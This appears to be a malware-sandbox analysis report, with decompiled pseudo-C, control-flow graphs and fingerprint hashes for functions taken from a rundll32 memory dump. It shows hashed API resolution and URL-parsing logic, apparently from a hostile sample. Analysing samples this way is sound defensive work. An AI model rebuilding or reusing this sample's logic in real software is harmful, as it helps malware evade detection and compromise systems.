				void* _t131;
				char* _t134;
				long long _t140;
				void* _t141;
				void* _t143;
				void* _t144;
				signed long long _t156;
				void* _t158;

				_t106 = __rbx;
				_t104 = __rax;
				 *((long long*)(_t143 + 8)) = __rbx;
				 *((long long*)(_t143 + 0x18)) = _t140;
				 *((long long*)(_t143 + 0x20)) = __rsi;
				_t144 = _t143 - 0x40;
				r14d =  *0xa29ad450;
				_t141 = __rcx;
				_t137 =  *((intOrPtr*)( *0xa29ad458 + 8));
				r12d = 0;
				_t34 = r14d ^ __edx;
				if (_t34 == 0x139d2b8d) goto 0xa29a80ef;
				if (_t34 == 0x15f5a8c2) goto 0xa29a8115;
				if (_t34 == 0x2f77acf9) goto 0xa29a80e9;
				if (_t34 == 0x48e12436) goto 0xa29a81c8;
				if (_t34 == 0x4d382929) goto 0xa29a8164;
				if (_t34 == 0xb016dc39) goto 0xa29a80c9;
				if (_t34 == 0xb057dfc9) goto 0xa29a805b;
				goto 0xa29a821b;
				if (r9d == 0) goto 0xa29a80bf;
				E00000201201A29A85CC(r9d, __rbx, __r8,  *((intOrPtr*)( *0xa29ad458 + 8)), _t158);
				if (_t104 == 0) goto 0xa29a80b5;
				 *(_t144 + 0x20) =  *(_t144 + 0x20) & _t156;
				if (E00000201201A29A14B8(_t104, _t106, _t141, 0x201a29a34a4,  *((intOrPtr*)( *0xa29ad458 + 8)), _t104,  *((intOrPtr*)(_t144 + 0x80))) != 0) goto 0xa29a80a2;
				goto 0xa29a821b;
				HeapFree(_t131, ??);
				goto 0xa29a821b;
				goto 0xa29a821b;
				goto 0xa29a821b;
				E00000201201A29A908C(0xd97160e4, _t104,  *((intOrPtr*)( *((intOrPtr*)( *0xa29ad458 + 8)) + 0x18)));
				if (_t104 == 0) goto 0xa29a80e2;
				 *_t104();
				goto 0xa29a821b;
				r12d = 1;
				if ( *(_t141 + 0x50) == 0) goto 0xa29a814a;
				E00000201201A29A908C(0xf2d20ec6, _t104,  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x28)) + 0x18)));
				if (_t104 == 0) goto 0xa29a8139;
				 *_t104();
				goto 0xa29a813e;
				if (r9d == 0) goto 0xa29a80bf;
				E00000201201A29A85CC(r9d,  *(_t141 + 0x50), _t104,  *((intOrPtr*)( *0xa29ad458 + 8)), _t156);
				_t134 = _t104;
				if (_t104 == 0) goto 0xa29a80b5;
				goto 0xa29a807a;
				asm("sbb ebx, ebx");
				goto 0xa29a814f;
				if (r12d == 0) goto 0xa29a821b;
				if (0x426 != 0x426) goto 0xa29a821b;
				if (_t134 == 0) goto 0xa29a81be;
				if ( *_t134 == 0) goto 0xa29a81be;
				E00000201201A29A487A();
				if (E00000201201A29A5448(_t104,  *(_t141 + 0x50), _t134, _t144 + 0x30, _t137, _t141) != 0) goto 0xa29a81bc;
				if (E00000201201A29A672C(_t134, _t144 + 0x30, _t144 + 0x68) == 0) goto 0xa29a81be;
				asm("ror ax, 0x8");
				 *((short*)(_t144 + 0x32)) =  *(_t144 + 0x68) & 0x0000ffff;
				r12d = 1;
				if (0 != 0) goto 0xa29a821b;
				if ( *(_t141 + 0x50) == 0) goto 0xa29a81fb;
				 *(_t141 + 0x50) =  *(_t141 + 0x50) & 0x00000000;
				E00000201201A29A2874( *((intOrPtr*)( *0xa29ad458 + 8)),  *(_t141 + 0x50), _t134,  *(_t141 + 0x50));
				HeapFree(??, ??, ??);
				goto 0xa29a8200;
				if (r12d == 0) goto 0xa29a821b;
				_t27 = _t144 + 0x30; // 0x31
				_t66 = E00000201201A29A9214( *((intOrPtr*)( *0xa29ad458 + 8)), _t27, _t134,  *(_t141 + 0x50), _t141,  *((intOrPtr*)(_t141 + 0x38)), _t141 + 0x50);
				if ( *((long long*)(_t144 + 0x80)) == 0) goto 0xa29a8241;
				if (_t66 == 0x3e5) goto 0xa29a8241;
				r8d = _t66;
				E00000201201A29A6AC0( *0xa29ad458,  *((intOrPtr*)( *0xa29ad458 + 8)), _t141,  *((intOrPtr*)(_t144 + 0x80)),  *(_t141 + 0x50), _t141);
				return _t66;
			}















                                0x201a29a7fd4
                                0x201a29a7fd4
                                0x201a29a7fd4
                                0x201a29a7fd9
                                0x201a29a7fde
                                0x201a29a7fe8
                                0x201a29a7fec
                                0x201a29a7ff3
                                0x201a29a7ffd
                                0x201a29a8004
                                0x201a29a8007
                                0x201a29a8011
                                0x201a29a801c
                                0x201a29a8027
                                0x201a29a8032
                                0x201a29a803d
                                0x201a29a8048
                                0x201a29a804f
                                0x201a29a8056
                                0x201a29a805e
                                0x201a29a8066
                                0x201a29a8071
                                0x201a29a8082
                                0x201a29a8096
                                0x201a29a809d
                                0x201a29a80aa
                                0x201a29a80b0
                                0x201a29a80ba
                                0x201a29a80c4
                                0x201a29a80d2
                                0x201a29a80da
                                0x201a29a80e0
                                0x201a29a80e4
                                0x201a29a80e9
                                0x201a29a80f6
                                0x201a29a8101
                                0x201a29a8109
                                0x201a29a8111
                                0x201a29a8113
                                0x201a29a8118
                                0x201a29a8120
                                0x201a29a8125
                                0x201a29a812b
                                0x201a29a8134
                                0x201a29a8140
                                0x201a29a8148
                                0x201a29a8152
                                0x201a29a815e
                                0x201a29a816c
                                0x201a29a8171
                                0x201a29a8185
                                0x201a29a8199
                                0x201a29a81ac
                                0x201a29a81b3
                                0x201a29a81b7
                                0x201a29a81be
                                0x201a29a81c6
                                0x201a29a81cf
                                0x201a29a81d1
                                0x201a29a81e4
                                0x201a29a81f1
                                0x201a29a81f9
                                0x201a29a8203
                                0x201a29a820d
                                0x201a29a8219
                                0x201a29a8224
                                0x201a29a822c
                                0x201a29a8236
                                0x201a29a823c
                                0x201a29a825b

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: ))8M$6$H$lJu
                                • API String ID: 3298025750-2816507560
                                • Opcode ID: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction ID: 967abaa9d643e3318b2c34e89ebda9a65894770696001b92c464e367763972f7
                                • Opcode Fuzzy Hash: e943009c52edc3a9ff9218d50e7176983ae45fe1d98091206747ec6dadb96f7e
                                • Instruction Fuzzy Hash: 0E617121306BA145FFAC9A6E948D3AB52A1B784FCCF784121DE4947797DE28C867C302
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29A1BFC Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 216memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 471 201a29a1bfc-201a29a1c41 472 201a29a1c4a-201a29a1c5b call 201a29a908c 471->472 473 201a29a1c43-201a29a1c45 call 201a29a47b8 471->473 477 201a29a1c5d 472->477 478 201a29a1c63-201a29a1c6d 472->478 473->472 477->478 479 201a29a1c6f-201a29a1c80 478->479 480 201a29a1cdd-201a29a1ce4 478->480 482 201a29a1c94 479->482 483 201a29a1c82-201a29a1c85 479->483 481 201a29a1ceb-201a29a1cfc call 201a29a908c 480->481 492 201a29a1d09-201a29a1d0c 481->492 493 201a29a1cfe-201a29a1d03 481->493 487 201a29a1c97-201a29a1c9a 482->487 485 201a29a1c90-201a29a1c92 483->485 486 201a29a1c87-201a29a1c8e 483->486 485->482 485->487 486->483 486->485 489 201a29a1c9c-201a29a1ca0 487->489 490 201a29a1caf-201a29a1cb4 487->490 489->490 494 201a29a1ca2-201a29a1ca6 489->494 491 201a29a1cb6 call 201a29a240c 490->491 495 201a29a1cbb-201a29a1cc1 491->495 496 201a29a1ed1 492->496 497 201a29a1d12-201a29a1d3c 492->497 493->492 494->490 498 201a29a1ca8-201a29a1cac 494->498 495->480 499 201a29a1cc3-201a29a1cdb 495->499 500 201a29a1ed6-201a29a1eef 496->500 501 201a29a1d40 call 201a29a5168 497->501 498->490 499->481 502 201a29a1d45-201a29a1d49 501->502 503 201a29a1d4f-201a29a1d6f call 201a29a908c 502->503 504 201a29a1ec1-201a29a1ecf HeapFree 502->504 507 201a29a1d71 503->507 508 201a29a1d77-201a29a1d7e 503->508 504->500 507->508 509 201a29a1d8c 508->509 510 201a29a1d80 508->510 512 201a29a1d94-201a29a1da5 call 201a29a908c 509->512 511 201a29a1d82 call 201a29a240c 510->511 513 201a29a1d87-201a29a1d8a 511->513 516 201a29a1dad-201a29a1db0 512->516 517 201a29a1da7 512->517 513->512 518 201a29a1ea1-201a29a1ebb HeapFree * 2 516->518 519 201a29a1db6-201a29a1dc9 call 201a29a908c 516->519 517->516 518->504 522 201a29a1dcb-201a29a1dd3 519->522 523 201a29a1dd5 519->523 524 201a29a1dd8-201a29a1deb call 201a29a908c 522->524 523->524 528 201a29a1ded-201a29a1df5 524->528 529 201a29a1df7 524->529 530 201a29a1dfa-201a29a1dff 528->530 529->530 532 201a29a1e02 call 201a29a240c 530->532 533 201a29a1e07-201a29a1e0d 532->533 534 201a29a1e93-201a29a1e9b HeapFree 533->534 535 201a29a1e13-201a29a1e7c call 201a29a47b0 call 201a29a6518 533->535 534->518 540 201a29a1e7e-201a29a1e83 535->540 541 201a29a1e85-201a29a1e8d HeapFree 535->541 540->541 541->534
                                C-Code - Quality: 17%
                                			E00000201201A29A1BFC(long long* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, intOrPtr _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
				long long _v72;
				char _v80;
				char _v88;
				long long _v96;
				char _v104;
				signed int _v112;
				long long _v120;
				long long _v128;
				intOrPtr _v136;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t65;
				intOrPtr _t93;
				intOrPtr _t94;
				long long* _t148;
				long long* _t152;
				long long* _t155;
				long long* _t157;
				intOrPtr* _t188;
				intOrPtr _t189;
				long long _t192;
				long long* _t193;
				void* _t203;
				intOrPtr _t213;
				long long _t214;

				_t157 = __rbx;
				_t148 = __rax;
				_a24 = __rbx;
				_a16 = __rdx;
				_t214 =  *0xa29ad458;
				_t192 =  *((intOrPtr*)(__rcx));
				r13d = r8d;
				_t193 = __rcx;
				_v72 = _t214;
				_v96 = _t192;
				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0xa29a1c4a;
				E00000201201A29A47B8(0, __rax, __rbx, __rcx, __rdx);
				E00000201201A29A908C(0x4a75e5e7, __rax,  *((intOrPtr*)(_t214 + 0x10)));
				if (_t148 == _t157) goto 0xa29a1c63;
				_t9 = _t192 + 0x18; // 0x18
				 *_t148();
				_t65 =  *(_t193 + 0x50) & 0x000000ff;
				if (( *(_t193 + 0x70) & 0x000000ff) - _t65 >= 0) goto 0xa29a1cdd;
				_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t193 + 0x48)) + _t9 * 8));
				_t93 =  *_t188;
				if (_t93 == 0) goto 0xa29a1c94;
				if (_t93 == 0x2f) goto 0xa29a1c90;
				_t94 =  *((intOrPtr*)(_t188 + 1));
				if (_t94 != 0) goto 0xa29a1c82;
				if (_t94 != 0) goto 0xa29a1c97;
				_t152 = _t157;
				if (_t152 == _t157) goto 0xa29a1caf;
				if ( *((char*)(_t152 - 1)) != 0x3a) goto 0xa29a1caf;
				if ( *((char*)(_t152 + 1)) != 0x2f) goto 0xa29a1caf;
				E00000201201A29A240C(0, _t157, _t9 + _t188, _t192, _t193);
				if (_t152 == _t157) goto 0xa29a1cdd;
				bpl = _t65 - 0x4a75e5e7 + 2 == 8;
				_a8 = 0;
				goto 0xa29a1ceb;
				E00000201201A29A908C(0x8d72aad2, _t152,  *((intOrPtr*)(_t214 + 0x10)));
				if (_t152 == _t157) goto 0xa29a1d09;
				 *_t152();
				if (_t152 == _t157) goto 0xa29a1ed1;
				_t23 =  &_v104; // 0x2
				r9d = 0;
				r8d = r13d;
				_v112 = _t23;
				_t25 =  &_v88; // 0x12
				_t189 = _a16;
				_v120 = _t25;
				_t27 =  &_v80; // 0x1a
				_t155 = _t27;
				_v128 = _t155;
				_v136 = 0;
				if (E00000201201A29A5168(_t157, _t193, _t189, _t203) != 0) goto 0xa29a1ec1;
				_t213 =  *0xa29ad458;
				E00000201201A29A908C(0x4a75e5e7, _t155,  *((intOrPtr*)(_t213 + 0x10)));
				if (_t155 == _t157) goto 0xa29a1d77;
				 *_t155();
				if ( *((intOrPtr*)(_t193 + 0x18)) == _t157) goto 0xa29a1d8c;
				E00000201201A29A240C(0, _t157,  *((intOrPtr*)(_t193 + 0x18)), _t192, _t193);
				goto 0xa29a1d94;
				E00000201201A29A908C(0x8d72aad2, _t155,  *((intOrPtr*)(_t213 + 0x10)));
				if (_t155 == _t157) goto 0xa29a1dad;
				 *_t155();
				if (_a8 == _t157) goto 0xa29a1ea1;
				E00000201201A29A908C(0xfb849f8f, _t155,  *((intOrPtr*)(_t214 + 0x18)));
				if (_t155 == _t157) goto 0xa29a1dd5;
				r14d =  *_t155();
				goto 0xa29a1dd8;
				r14d = 0;
				E00000201201A29A908C(0xfb849f8f, _t155,  *((intOrPtr*)(_v72 + 0x18)));
				if (_t155 == _t157) goto 0xa29a1df7;
				r13d =  *_t155();
				goto 0xa29a1dfa;
				r13d = 0;
				_t40 = _t214 + 2; // 0x2
				E00000201201A29A240C(_t213 + _t40, _t157, _t152, _t192, _a8);
				if (_t155 == _t157) goto 0xa29a1e93;
				_t41 = _t213 + 1; // 0x1
				r8d = _t41;
				 *((char*)(_t189 + _t155)) = 0x2f;
				0xa29a47b0();
				_v112 = 0 | _a8 != 0x00000000 | 0x00000002;
				_v120 = _a48;
				_v128 = _a40;
				_v136 = _v104;
				if (E00000201201A29A6518(_a40, _v96, _t155, _t192, _a8, _t155, _v80, _v88) != 0x10d2) goto 0xa29a1e85;
				asm("sbb eax, eax");
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0xa29a1ed6;
				return 8;
			}





























                                0x201a29a1bfc
                                0x201a29a1bfc
                                0x201a29a1bfc
                                0x201a29a1c01
                                0x201a29a1c15
                                0x201a29a1c1f
                                0x201a29a1c28
                                0x201a29a1c2e
                                0x201a29a1c31
                                0x201a29a1c36
                                0x201a29a1c41
                                0x201a29a1c45
                                0x201a29a1c53
                                0x201a29a1c5b
                                0x201a29a1c5d
                                0x201a29a1c61
                                0x201a29a1c67
                                0x201a29a1c6d
                                0x201a29a1c75
                                0x201a29a1c7c
                                0x201a29a1c80
                                0x201a29a1c85
                                0x201a29a1c8a
                                0x201a29a1c8e
                                0x201a29a1c92
                                0x201a29a1c94
                                0x201a29a1c9a
                                0x201a29a1ca0
                                0x201a29a1ca6
                                0x201a29a1cb6
                                0x201a29a1cc1
                                0x201a29a1cc8
                                0x201a29a1ccc
                                0x201a29a1cdb
                                0x201a29a1cf4
                                0x201a29a1cfc
                                0x201a29a1d07
                                0x201a29a1d0c
                                0x201a29a1d12
                                0x201a29a1d17
                                0x201a29a1d1a
                                0x201a29a1d1d
                                0x201a29a1d22
                                0x201a29a1d27
                                0x201a29a1d2a
                                0x201a29a1d2f
                                0x201a29a1d2f
                                0x201a29a1d37
                                0x201a29a1d3c
                                0x201a29a1d49
                                0x201a29a1d4f
                                0x201a29a1d67
                                0x201a29a1d6f
                                0x201a29a1d75
                                0x201a29a1d7e
                                0x201a29a1d82
                                0x201a29a1d8a
                                0x201a29a1d9d
                                0x201a29a1da5
                                0x201a29a1dab
                                0x201a29a1db0
                                0x201a29a1dc1
                                0x201a29a1dc9
                                0x201a29a1dd0
                                0x201a29a1dd3
                                0x201a29a1dd5
                                0x201a29a1de3
                                0x201a29a1deb
                                0x201a29a1df2
                                0x201a29a1df5
                                0x201a29a1df7
                                0x201a29a1dfa
                                0x201a29a1e02
                                0x201a29a1e0d
                                0x201a29a1e16
                                0x201a29a1e16
                                0x201a29a1e1f
                                0x201a29a1e26
                                0x201a29a1e52
                                0x201a29a1e5e
                                0x201a29a1e67
                                0x201a29a1e6c
                                0x201a29a1e7c
                                0x201a29a1e81
                                0x201a29a1e8d
                                0x201a29a1e9b
                                0x201a29a1eab
                                0x201a29a1ebb
                                0x201a29a1ec9
                                0x201a29a1ecf
                                0x201a29a1eef

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID: uJ$uJ
                                • API String ID: 2332451156-3171342107
                                • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction ID: 7ceb53e716cfd62756d0d8805b11dfc085cf105fc13c582d9c9550b5a3447f23
                                • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction Fuzzy Hash: 1681B4227067A086EF64DB1AA45826B77A1F7C9F88F684421DE8E47746DF38C456C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29AA238 Relevance: 6.4, APIs: 5, Instructions: 127memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 19%
                                			E00000201201A29AA238(void* __ecx, void* __edi, void* __ebp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9, void* _a8, long long* _a24, char _a32) {
				char _v72;
				char _v80;
				char _v88;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t41;
				void* _t43;
				long long* _t82;
				long long _t83;
				long long _t84;
				intOrPtr _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t112;
				void* _t115;
				long long* _t118;
				void* _t130;
				long _t133;
				void* _t134;
				long _t136;
				void* _t139;

				_t84 = __rbx;
				_t82 = _t118;
				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x18)) = __r8;
				_t3 = _t82 + 0x20; // 0xfb849fa7
				_t134 = __rcx;
				E00000201201A29A24B0(__rbx, _t3, _t112);
				if (_t82 == 0) goto 0xa29aa3dc;
				E00000201201A29A908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t82 == 0) goto 0xa29aa29f;
				_v88 =  *_t82();
				goto 0xa29aa2a5;
				_v88 = 0;
				_t10 = _t82 + 1; // 0x1
				r8d = _t109 + _t10;
				HeapAlloc(_t139, _t136, _t133);
				_v80 = _t82;
				if (_t82 == 0) goto 0xa29aa3ce;
				0xa29a47b0();
				_t13 = _t109 + 1; // 0x1
				r8d = _t13;
				0xa29a47b0();
				E00000201201A29A908C(0xfb849f8f, _t82,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t82 == 0) goto 0xa29aa30d;
				 *_t82();
				goto 0xa29aa30f;
				_t16 =  &_a32; // 0xfb84a007
				_t17 =  &_v72; // 0xfb849f9f
				r8d = 0;
				_v104 = _t16;
				_t41 = E00000201201A29A7CF4(_t82, _t84, _t134, _t82,  *((intOrPtr*)( *0xa29ad458 + 8)), _t17, _t130, _t109);
				HeapFree(??, ??, ??);
				if (_t41 != 0) goto 0xa29aa3ce;
				r8d = _a32;
				_t108 = _v72;
				_t21 =  &_v88; // 0xfb849f8f
				_t83 = _t21;
				_t22 =  &_v80; // 0xfb849f87
				_v104 = _t83;
				_t43 = E00000201201A29A52B8(_t84, _t108, _t82,  *((intOrPtr*)( *0xa29ad458 + 8)), _t22, _t112, _t115);
				_t110 = _v80;
				if (_v88 == 0) goto 0xa29aa389;
				if ( *((char*)(_t108 + _t110)) != 0x3d) goto 0xa29aa389;
				if (_t134 - 1 != 0) goto 0xa29aa37a;
				 *((char*)(_t83 + _t110)) = 0;
				if (_t43 != 0) goto 0xa29aa3b0;
				E00000201201A29A7500(_t84, _t110, _t108, _t110, _t82,  *((intOrPtr*)( *0xa29ad458 + 8)));
				if (_t83 != 0) goto 0xa29aa3a5;
				_t29 = _t83 + 8; // 0x8
				goto 0xa29aa3b0;
				 *_a24 = _t83;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return _t29;
			}


























                                0x201a29aa238
                                0x201a29aa238
                                0x201a29aa23b
                                0x201a29aa23f
                                0x201a29aa25c
                                0x201a29aa265
                                0x201a29aa26d
                                0x201a29aa278
                                0x201a29aa288
                                0x201a29aa290
                                0x201a29aa299
                                0x201a29aa29d
                                0x201a29aa2a1
                                0x201a29aa2b1
                                0x201a29aa2b1
                                0x201a29aa2b6
                                0x201a29aa2bf
                                0x201a29aa2c7
                                0x201a29aa2dd
                                0x201a29aa2e2
                                0x201a29aa2e2
                                0x201a29aa2ed
                                0x201a29aa2fc
                                0x201a29aa304
                                0x201a29aa309
                                0x201a29aa30b
                                0x201a29aa30f
                                0x201a29aa317
                                0x201a29aa31c
                                0x201a29aa31f
                                0x201a29aa32a
                                0x201a29aa339
                                0x201a29aa341
                                0x201a29aa347
                                0x201a29aa34f
                                0x201a29aa354
                                0x201a29aa354
                                0x201a29aa359
                                0x201a29aa361
                                0x201a29aa366
                                0x201a29aa36f
                                0x201a29aa378
                                0x201a29aa381
                                0x201a29aa387
                                0x201a29aa38b
                                0x201a29aa391
                                0x201a29aa396
                                0x201a29aa39e
                                0x201a29aa3a0
                                0x201a29aa3a3
                                0x201a29aa3ad
                                0x201a29aa3b8
                                0x201a29aa3c8
                                0x201a29aa3d6
                                0x201a29aa3f5

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID:
                                • API String ID: 1659099196-0
                                • Opcode ID: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction ID: ed12e3e9fc01d63de37b33e3843679f597bd6b0e82b1cd53f27575ca23013bb1
                                • Opcode Fuzzy Hash: ebec7e3ced01d3e53c95a68bcdc967b9fa3e31920521932be2b83d349f2b3dc9
                                • Instruction Fuzzy Hash: 784161213067A186EF5CDB5AA44879B77A1BBC9FC8F248025DE4E43746EF38C516C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201A29A2DC4 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 192memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 648 201a29a2dc4-201a29a2e0e 649 201a29a2e13 call 201a29a4320 648->649 650 201a29a2e18-201a29a2e1a 649->650 651 201a29a2e1c-201a29a2e27 650->651 652 201a29a2e29-201a29a2e2e 650->652 653 201a29a2e34-201a29a2e44 651->653 652->653 654 201a29a2e47 call 201a29a4880 653->654 655 201a29a2e4c-201a29a2e50 654->655 656 201a29a2f94-201a29a2f9a 655->656 657 201a29a2e56-201a29a2e6c 655->657 660 201a29a2f9c-201a29a2faa call 201a29a47b8 656->660 661 201a29a2fc2 656->661 658 201a29a2e8d-201a29a2ee8 call 201a29a1bfc HeapFree 657->658 659 201a29a2e6e-201a29a2e88 657->659 670 201a29a2eea-201a29a2eec 658->670 671 201a29a2f01-201a29a2f03 658->671 659->658 672 201a29a2faf-201a29a2fb1 660->672 662 201a29a2fc7 661->662 665 201a29a2fcd-201a29a2fd1 662->665 668 201a29a302f-201a29a3032 665->668 669 201a29a2fd3-201a29a2fe4 call 201a29a908c 665->669 673 201a29a308e-201a29a30a0 668->673 674 201a29a3034-201a29a3044 HeapFree 668->674 687 201a29a2fed-201a29a2ff0 669->687 688 201a29a2fe6 669->688 677 201a29a2eee-201a29a2ef4 670->677 678 201a29a2ef6-201a29a2efc call 201a29aa3f8 670->678 671->656 675 201a29a2f09-201a29a2f46 call 201a29a6c1c call 201a29a7b6c 671->675 672->665 679 201a29a2fb3-201a29a2fc0 672->679 680 201a29a304e-201a29a305f call 201a29a908c 674->680 681 201a29a3046-201a29a304c 674->681 697 201a29a2f71-201a29a2f92 HeapFree call 201a29a47b8 675->697 698 201a29a2f48-201a29a2f6d 675->698 677->671 677->678 678->671 679->665 694 201a29a3061 680->694 695 201a29a3067-201a29a3086 call 201a29a908c 680->695 681->673 681->680 691 201a29a301c-201a29a302b 687->691 692 201a29a2ff2-201a29a2ffb 687->692 688->687 691->668 692->691 696 201a29a2ffd-201a29a300d call 201a29a47b8 692->696 694->695 695->673 706 201a29a3088 695->706 696->691 707 201a29a300f-201a29a3017 696->707 697->672 698->665 701 201a29a2f6f 698->701 701->662 706->673 707->691
                                C-Code - Quality: 41%
                                			E00000201201A29A2DC4(void* __rcx, long long __rdx, long long __r8, signed int _a8, long long* _a16, signed int* _a24, signed int _a32) {
				intOrPtr _v88;
				void* _v96;
				void* _v104;
				long long _v112;
				signed int _v120;
				long long _v128;
				long long _v136;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t72;
				signed int _t80;
				void* _t81;
				void* _t97;
				signed int _t98;
				void* _t99;
				void* _t114;
				long long* _t139;
				signed long long _t140;
				long long* _t142;
				void* _t143;
				void* _t169;
				void* _t170;
				void* _t172;
				signed int _t173;
				long _t177;
				void* _t179;
				void* _t190;
				void* _t191;
				void* _t192;
				signed int* _t193;
				long long _t194;
				void* _t200;
				long _t202;
				void* _t205;

				_t191 = _t179;
				 *((long long*)(_t191 + 0x18)) = __r8;
				 *((long long*)(_t191 + 0x10)) = __rdx;
				_t203 =  *0xa29ad458;
				 *(_t191 + 0x20) =  *(_t191 + 0x20) & 0x00000000;
				_t170 = __rcx;
				_v120 =  *0xa29ad450;
				r15d = 0;
				 *(_t191 - 0x60) =  *(_t191 - 0x60) & _t205;
				_v112 =  *((intOrPtr*)( *0xa29ad458 + 8));
				if (E00000201201A29A4320(_t143, __rcx, _t191 - 0x68, __rcx, _t172, _t191 + 8) == 0) goto 0xa29a2e29;
				_t12 = _t205 + 1; // 0x1
				r12d = _t12;
				_v104 = _t172;
				goto 0xa29a2e34;
				_t173 = _v104;
				r12d = 2;
				_t15 =  &_a32; // 0xca
				if (E00000201201A29A4880(r12d, _t114,  *((intOrPtr*)( *0xa29ad458 + 8)), _t143, _t170,  &_v96, _t15) != 0) goto 0xa29a2f94;
				r8d = _a32;
				r13d = r8d;
				r13d = r13d - r12d;
				_t193 = _v96;
				if (_t173 == 0) goto 0xa29a2e8d;
				_t72 = _a8;
				_t193[0xa] = 1;
				_t193[0x12] = _t173;
				_t193[0xd] = _t72;
				_t193[0x10] = _t72;
				_t25 = _t170 + 0xc0; // 0xc0
				r9d = 0;
				 *_t193 = _v120 ^ 0x62ade362;
				_t193[3] =  *(_t170 + 0x48);
				_t193[2] =  *(_t170 + 0x4c);
				_t30 =  &_a8; // 0xb2
				_v128 = _t30;
				_t32 =  &_v120; // 0x32
				_v136 = _t32;
				_t97 = E00000201201A29A1BFC(_t32, _t143, _t25, _t193);
				HeapFree(_t205, _t202, _t200);
				if (r13d == 0) goto 0xa29a2f01;
				if (_t97 == 0) goto 0xa29a2ef6;
				if (_t97 != 0x10d2) goto 0xa29a2f01;
				E00000201201A29AA3F8(r13d, _t32, _t143, _t170, _t173, _t177, _t192, _t169);
				if (_t97 != 0) goto 0xa29a2f94;
				_t98 = _a8;
				_t194 = _v120;
				r13d =  *(_t170 + 0x4c);
				_t80 = E00000201201A29A6C1C(_t98, _t194);
				_t38 =  &_a8; // 0xb2
				r9d = 1;
				 *(_t170 + 0x48) = _t98;
				 *(_t170 + 0x4c) = _t80;
				_t81 = E00000201201A29A7B6C(_t143, _t170, _t194, _t173, _t177, _t38, _t190, _t191);
				_t99 = _t81;
				if (_t81 != 0) goto 0xa29a2f71;
				_t139 = _a16;
				 *_t139 = _t194;
				 *_a24 = _a8;
				if ( *(_t170 + 0x4c) != r13d) goto 0xa29a2fcd;
				goto 0xa29a2fc7;
				HeapFree(_t172, _t177, _t143);
				_t47 = _t170 + 0xc0; // 0xc0
				E00000201201A29A47B8(_t99, _t139, _t143, _t47, _t177);
				goto 0xa29a2faf;
				if (_t99 == 0x10d2) goto 0xa29a2fc2;
				_t48 = _t170 + 0xc0; // 0xc0
				if (E00000201201A29A47B8(_t99, _t139, _t143, _t48, _t177) != 0) goto 0xa29a2fcd;
				asm("lock or dword [edi+0xec], 0x1");
				goto 0xa29a2fcd;
				r15d = 1;
				if ( *((intOrPtr*)(_t170 + 0x60)) == 0) goto 0xa29a302f;
				E00000201201A29A908C(0x9c66d81c, _t139,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
				if (_t139 == 0) goto 0xa29a2fed;
				 *_t139();
				if (r15d == 0) goto 0xa29a301c;
				_t140 =  *((intOrPtr*)(_t170 + 0x58));
				if (_v88 - _t140 <= 0) goto 0xa29a301c;
				_t57 = _t170 + 0xc0; // 0xc1
				if (E00000201201A29A47B8(_t99, _t140, _t143, _t57, _t177) != 0) goto 0xa29a301c;
				asm("lock or dword [edi+0xec], 0x1");
				_t142 = _t140 * 0x23c34600 + _v88;
				 *((long long*)(_t170 + 0x58)) = _t142;
				if (_v104 == 0) goto 0xa29a308e;
				HeapFree(??, ??, ??);
				if (_t99 == 0) goto 0xa29a304e;
				if (_t99 != 0x10d2) goto 0xa29a308e;
